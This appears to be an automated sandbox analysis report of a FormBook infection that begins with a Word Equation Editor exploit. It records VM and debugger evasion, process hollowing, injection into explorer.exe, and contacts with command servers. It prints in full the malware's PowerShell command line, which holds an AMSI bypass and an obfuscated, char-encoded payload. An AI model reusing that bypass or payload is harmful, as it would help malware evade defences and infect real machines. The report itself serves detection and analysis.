          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000D9904 second address: 00000000000D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000D9B7E second address: 00000000000D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1200Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2576Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2576Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2432Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2612Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00409AB0 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.489512563.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0\?P
          Source: explorer.exe, 0000000B.00000000.489512563.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000B.00000000.536704123.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmpBinary or memory string: `(SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000ALBG
          Source: explorer.exe, 0000000B.00000000.540834736.00000000045CF000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A10080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A100EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_025626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\calc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00409AB0 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\calc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0040ACF0 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.marcasemele.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.230.63.177 80
          Source: C:\Windows\explorer.exeDomain query: www.lillianpsmith.com
          Source: C:\Windows\explorer.exeDomain query: www.vecydoy.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 50.62.137.48 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.39.13 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5A
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 800000
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 7EFDE008
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1764
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$0462662046266204626620462662046266204626620462662=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
          Source: explorer.exe, 0000000B.00000000.478270786.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 0000000B.00000000.478270786.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 0000000B.00000000.478270786.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation11DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Credential API Hooking1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer4Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
